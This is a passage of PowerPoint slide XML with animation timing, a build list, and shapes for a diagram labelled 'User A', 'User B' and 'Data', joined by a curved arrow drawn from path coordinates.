                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect filter="dissolve" transition="in">
                                      <p:cBhvr>
                                        <p:cTn id="93" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="864"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                            </p:childTnLst>
                          </p:cTn>
                        </p:par>
                      </p:childTnLst>
                    </p:cTn>
                  </p:par>
                  <p:par>
                    <p:cTn id="94" fill="hold">
                      <p:stCondLst>
                        <p:cond delay="indefinite"/>
                      </p:stCondLst>
                      <p:childTnLst>
                        <p:par>
                          <p:cTn id="95" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="0"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="96" presetClass="entr" nodeType="clickEffect" presetSubtype="16" presetID="23" grpId="21" fill="hold">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:iterate type="el" backwards="0">
                                    <p:tmAbs val="0"/>
                                  </p:iterate>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="97" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="869"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="98" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="869"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_w</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:fltVal val="0"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_w"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="99" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="869"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_h</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:fltVal val="0"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_h"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                            </p:childTnLst>
                          </p:cTn>
                        </p:par>
                        <p:par>
                          <p:cTn id="100" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="500"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="101" presetClass="entr" nodeType="afterEffect" presetSubtype="16" presetID="23" grpId="22" fill="hold">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:iterate type="el" backwards="0">
                                    <p:tmAbs val="0"/>
                                  </p:iterate>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="102" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="868"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="103" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="868"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_w</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:fltVal val="0"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_w"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="104" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="868"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_h</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:fltVal val="0"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_h"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                            </p:childTnLst>
                          </p:cTn>
                        </p:par>
                        <p:par>
                          <p:cTn id="105" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="1000"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="106" presetClass="entr" nodeType="afterEffect" presetSubtype="16" presetID="23" grpId="23" fill="hold">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:iterate type="el" backwards="0">
                                    <p:tmAbs val="0"/>
                                  </p:iterate>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="107" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="872"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="108" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="872"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_w</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:fltVal val="0"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_w"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="109" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="872"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_h</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:fltVal val="0"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_h"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                            </p:childTnLst>
                          </p:cTn>
                        </p:par>
                        <p:par>
                          <p:cTn id="110" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="1500"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="111" presetClass="entr" nodeType="afterEffect" presetSubtype="0" presetID="1" grpId="24" fill="hold">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:iterate type="el" backwards="0">
                                    <p:tmAbs val="0"/>
                                  </p:iterate>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="112" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="8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52" grpId="5"/>
      <p:bldP build="whole" bldLvl="1" animBg="1" rev="0" advAuto="0" spid="862" grpId="15"/>
      <p:bldP build="whole" bldLvl="1" animBg="1" rev="0" advAuto="0" spid="863" grpId="19"/>
      <p:bldP build="whole" bldLvl="1" animBg="1" rev="0" advAuto="0" spid="853" grpId="3"/>
      <p:bldP build="whole" bldLvl="1" animBg="1" rev="0" advAuto="0" spid="855" grpId="7"/>
      <p:bldP build="whole" bldLvl="1" animBg="1" rev="0" advAuto="0" spid="853" grpId="6"/>
      <p:bldP build="whole" bldLvl="1" animBg="1" rev="0" advAuto="0" spid="869" grpId="21"/>
      <p:bldP build="whole" bldLvl="1" animBg="1" rev="0" advAuto="0" spid="854" grpId="2"/>
      <p:bldP build="whole" bldLvl="1" animBg="1" rev="0" advAuto="0" spid="864" grpId="20"/>
      <p:bldP build="whole" bldLvl="1" animBg="1" rev="0" advAuto="0" spid="854" grpId="8"/>
      <p:bldP build="whole" bldLvl="1" animBg="1" rev="0" advAuto="0" spid="865" grpId="18"/>
      <p:bldP build="whole" bldLvl="1" animBg="1" rev="0" advAuto="0" spid="861" grpId="14"/>
      <p:bldP build="whole" bldLvl="1" animBg="1" rev="0" advAuto="0" spid="867" grpId="17"/>
      <p:bldP build="whole" bldLvl="1" animBg="1" rev="0" advAuto="0" spid="876" grpId="10"/>
      <p:bldP build="whole" bldLvl="1" animBg="1" rev="0" advAuto="0" spid="873" grpId="9"/>
      <p:bldP build="whole" bldLvl="1" animBg="1" rev="0" advAuto="0" spid="868" grpId="22"/>
      <p:bldP build="whole" bldLvl="1" animBg="1" rev="0" advAuto="0" spid="860" grpId="13"/>
      <p:bldP build="whole" bldLvl="1" animBg="1" rev="0" advAuto="0" spid="845" grpId="11"/>
      <p:bldP build="whole" bldLvl="1" animBg="1" rev="0" advAuto="0" spid="872" grpId="23"/>
      <p:bldP build="whole" bldLvl="1" animBg="1" rev="0" advAuto="0" spid="866" grpId="16"/>
      <p:bldP build="whole" bldLvl="1" animBg="1" rev="0" advAuto="0" spid="840" grpId="12"/>
      <p:bldP build="whole" bldLvl="1" animBg="1" rev="0" advAuto="0" spid="851" grpId="4"/>
      <p:bldP build="whole" bldLvl="1" animBg="1" rev="0" advAuto="0" spid="855" grpId="1"/>
      <p:bldP build="whole" bldLvl="1" animBg="1" rev="0" advAuto="0" spid="885" grpId="24"/>
    </p:bldLst>
  </p:timing>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893" name="Group"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="6524977" y="1851377"/>
            <a:ext cx="5642188" cy="7166188"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="5642186" cy="7166186"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="891" name="Group"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="0" y="0"/>
              <a:ext cx="5642187" cy="7166187"/>
              <a:chOff x="0" y="0"/>
              <a:chExt cx="5642186" cy="7166186"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="889" name="Rounded Rectangle"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="0" y="0"/>
                <a:ext cx="5642187" cy="7166187"/>
              </a:xfrm>
              <a:prstGeom prst="roundRect">
                <a:avLst>
                  <a:gd name="adj" fmla="val 4167"/>
                </a:avLst>
              </a:prstGeom>
              <a:solidFill>
                <a:srgbClr val="F0F1E1"/>
              </a:solidFill>
              <a:ln w="12700" cap="flat">
                <a:solidFill>
                  <a:srgbClr val="808080"/>
                </a:solidFill>
                <a:prstDash val="solid"/>
                <a:round/>
              </a:ln>
              <a:effectLst>
                <a:outerShdw sx="100000" sy="100000" kx="0" ky="0" algn="b" rotWithShape="0" blurRad="88900" dist="50800" dir="2700000">
                  <a:srgbClr val="AFAFAF"/>
                </a:outerShdw>
              </a:effectLst>
            </p:spPr>
            <p:txBody>
              <a:bodyPr wrap="square" lIns="65023" tIns="65023" rIns="65023" bIns="65023" numCol="1" anchor="t">
                <a:noAutofit/>
              </a:bodyPr>
              <a:lstStyle/>
              <a:p>
                <a:pPr algn="r" defTabSz="1300480">
                  <a:defRPr sz="2400">
                    <a:latin typeface="Arial Narrow"/>
                    <a:ea typeface="Arial Narrow"/>
                    <a:cs typeface="Arial Narrow"/>
                    <a:sym typeface="Arial Narrow"/>
                  </a:defRPr>
                </a:pPr>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="890" name="User B"/>
              <p:cNvSpPr txBox="1"/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="68960" y="68960"/>
                <a:ext cx="5504267"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lgn="r" defTabSz="1300480">
                  <a:defRPr sz="2400">
                    <a:latin typeface="Arial Narrow"/>
                    <a:ea typeface="Arial Narrow"/>
                    <a:cs typeface="Arial Narrow"/>
                    <a:sym typeface="Arial Narrow"/>
                  </a:defRPr>
                </a:lvl1pPr>
              </a:lstStyle>
              <a:p>
                <a:pPr/>
                <a:r>
                  <a:t>User B</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
        </p:grpSp>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="892" name="User_UserHalfE01" descr="User_UserHalfE01"/>
            <p:cNvPicPr>
              <a:picLocks noChangeAspect="1"/>
            </p:cNvPicPr>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId2">
              <a:extLst/>
            </a:blip>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="4512786" y="554874"/>
              <a:ext cx="780226" cy="1145692"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:ln w="12700" cap="flat">
              <a:noFill/>
              <a:miter lim="400000"/>
            </a:ln>
            <a:effectLst/>
          </p:spPr>
        </p:pic>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="896" name="Group"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="672817" y="1851377"/>
            <a:ext cx="5578970" cy="7168446"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="5578969" cy="7168444"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="894" name="Rounded Rectangle"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="0" y="0"/>
              <a:ext cx="5578970" cy="7168445"/>
            </a:xfrm>
            <a:prstGeom prst="roundRect">
              <a:avLst>
                <a:gd name="adj" fmla="val 4167"/>
              </a:avLst>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="DEE7F1"/>
            </a:solidFill>
            <a:ln w="12700" cap="flat">
              <a:solidFill>
                <a:srgbClr val="808080"/>
              </a:solidFill>
              <a:prstDash val="solid"/>
              <a:round/>
            </a:ln>
            <a:effectLst>
              <a:outerShdw sx="100000" sy="100000" kx="0" ky="0" algn="b" rotWithShape="0" blurRad="88900" dist="50800" dir="2700000">
                <a:srgbClr val="AFAFAF"/>
              </a:outerShdw>
            </a:effectLst>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" lIns="65023" tIns="65023" rIns="65023" bIns="65023" numCol="1" anchor="t">
              <a:noAutofit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="l" defTabSz="1300480">
                <a:defRPr sz="2400">
                  <a:latin typeface="Arial Narrow"/>
                  <a:ea typeface="Arial Narrow"/>
                  <a:cs typeface="Arial Narrow"/>
                  <a:sym typeface="Arial Narrow"/>
                </a:defRPr>
              </a:pPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="895" name="User A"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="68187" y="68187"/>
              <a:ext cx="5442595"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lgn="l" defTabSz="1300480">
                <a:defRPr sz="2400">
                  <a:latin typeface="Arial Narrow"/>
                  <a:ea typeface="Arial Narrow"/>
                  <a:cs typeface="Arial Narrow"/>
                  <a:sym typeface="Arial Narrow"/>
                </a:defRPr>
              </a:lvl1pPr>
            </a:lstStyle>
            <a:p>
              <a:pPr/>
              <a:r>
                <a:t>User A</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="897" name="User_UserHalfD01" descr="User_UserHalfD01"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:extLst/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="900853" y="2409048"/>
            <a:ext cx="731521" cy="1151468"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="12700">
            <a:miter lim="400000"/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="902" name="Group"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="3388924" y="2921564"/>
            <a:ext cx="1108570" cy="1792676"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="1108568" cy="1792675"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="898" name="Document_Writing01" descr="Document_Writing01"/>
            <p:cNvPicPr>
              <a:picLocks noChangeAspect="1"/>
            </p:cNvPicPr>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId4">
              <a:extLst/>
            </a:blip>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="0" y="0"/>
              <a:ext cx="1108569" cy="1792676"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:ln w="12700" cap="flat">
              <a:noFill/>
              <a:miter lim="400000"/>
            </a:ln>
            <a:effectLst/>
          </p:spPr>
        </p:pic>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="901" name="Group"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="82488" y="762474"/>
              <a:ext cx="895307" cy="472949"/>
              <a:chOff x="0" y="18203"/>
              <a:chExt cx="895305" cy="472947"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="899" name="Oval"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="0" y="28329"/>
                <a:ext cx="895306" cy="452697"/>
              </a:xfrm>
              <a:prstGeom prst="ellipse">
                <a:avLst/>
              </a:prstGeom>
              <a:solidFill>
                <a:srgbClr val="FFFFFF">
                  <a:alpha val="74900"/>
                </a:srgbClr>
              </a:solidFill>
              <a:ln w="12700" cap="flat">
                <a:noFill/>
                <a:miter lim="400000"/>
              </a:ln>
              <a:effectLst/>
            </p:spPr>
            <p:txBody>
              <a:bodyPr wrap="square" lIns="65023" tIns="65023" rIns="65023" bIns="65023" numCol="1" anchor="ctr">
                <a:noAutofit/>
              </a:bodyPr>
              <a:lstStyle/>
              <a:p>
                <a:pPr marL="487680" indent="-487680" defTabSz="1300480">
                  <a:defRPr sz="2400">
                    <a:latin typeface="Arial Narrow"/>
                    <a:ea typeface="Arial Narrow"/>
                    <a:cs typeface="Arial Narrow"/>
                    <a:sym typeface="Arial Narrow"/>
                  </a:defRPr>
                </a:pPr>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="900" name="Data"/>
              <p:cNvSpPr txBox="1"/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="112331" y="18203"/>
                <a:ext cx="670643"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marL="487680" indent="-487680" defTabSz="1300480">
                  <a:defRPr sz="2400">
                    <a:latin typeface="Arial Narrow"/>
                    <a:ea typeface="Arial Narrow"/>
                    <a:cs typeface="Arial Narrow"/>
                    <a:sym typeface="Arial Narrow"/>
                  </a:defRPr>
                </a:lvl1pPr>
              </a:lstStyle>
              <a:p>
                <a:pPr/>
                <a:r>
                  <a:t>Data</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
        </p:grpSp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="903" name="Shape"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="1" rot="4500000">
            <a:off x="1521742" y="4831644"/>
            <a:ext cx="3546970" cy="21019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6" y="4483"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="21582" y="5861"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="21600" y="7192"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="21600" y="8406"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="21546" y="9597"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="21492" y="10718"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="21420" y="11746"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="21312" y="12773"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="21168" y="13684"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="21024" y="14571"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="20845" y="15389"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="20647" y="16159"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="20431" y="16836"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="20197" y="17514"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="19927" y="18074"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="19676" y="18634"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="19388" y="19125"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="19082" y="19568"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="18758" y="19989"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="18417" y="20362"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="18093" y="20666"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="17715" y="20899"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="17356" y="21133"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="16960" y="21296"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="16564" y="21437"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="16151" y="21530"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="15773" y="21600"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="14910" y="21600"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="14496" y="21530"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="14046" y="21460"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13597" y="21343"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13129" y="21203"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12697" y="20993"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12248" y="20783"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11780" y="20549"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11331" y="20292"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10863" y="20012"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10413" y="19685"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9946" y="19335"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9514" y="19008"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9064" y="18588"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8615" y="18214"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8183" y="17770"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7734" y="17350"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7320" y="16906"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6493" y="15926"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6061" y="15435"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5683" y="14945"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5288" y="14408"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4928" y="13894"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4550" y="13357"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4191" y="12797"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3849" y="12259"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3543" y="11699"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3219" y="11139"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2932" y="10578"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2644" y="9994"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2410" y="9457"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2158" y="8874"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1942" y="8336"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1745" y="7753"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1565" y="7216"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1403" y="6678"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="288" y="7262"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="126" y="3643"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="18" y="1121"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="327"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="198" y="257"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="755" y="887"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2410" y="2849"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4820" y="5698"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4083" y="5791"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3615" y="5908"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3417" y="5978"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3543" y="6398"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3687" y="6889"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3849" y="7332"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4065" y="7799"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4262" y="8313"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4478" y="8780"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4712" y="9294"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4946" y="9761"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5216" y="10275"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5485" y="10742"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6061" y="11746"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6385" y="12236"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6690" y="12703"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7032" y="13217"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7374" y="13661"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8057" y="14595"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8777" y="15482"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9532" y="16299"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9892" y="16673"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10287" y="17070"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10683" y="17397"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11043" y="17747"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11438" y="18051"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11852" y="18354"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12248" y="18634"/>
                </a:lnTo>
                <a:lnTo>
